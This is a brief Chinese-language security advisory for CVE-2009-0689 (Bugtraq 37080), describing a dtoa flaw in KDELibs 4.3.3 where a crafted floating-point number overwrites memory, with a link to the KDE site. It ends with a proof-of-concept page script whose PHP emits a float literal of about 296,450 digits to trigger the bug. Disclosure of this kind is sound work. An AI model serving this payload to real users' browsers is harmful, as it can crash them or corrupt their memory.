Bugraq ID: 37080
CVE ID:CVE-2009-0689
KDE是一款UNIX工下开源图形桌面环境。
KDELibs是建立在Qt框架之上,它提供框架和众多功能来开发KDE程序。其中dtoa实现存在错误,处理特殊构建的浮点数可导致内存覆盖。由于Kmac定义为15,dtoa函数没有检查Kmac限制,可能调用大于等于16的freelist数组元素。
KDE 4.3.3
目前没有详细解决方案提供:
http://www.kde.org/
- -----------------------
<script>
var a=0.<?php echo str_repeat("1",296450); ?>;
</script>
- -----------------------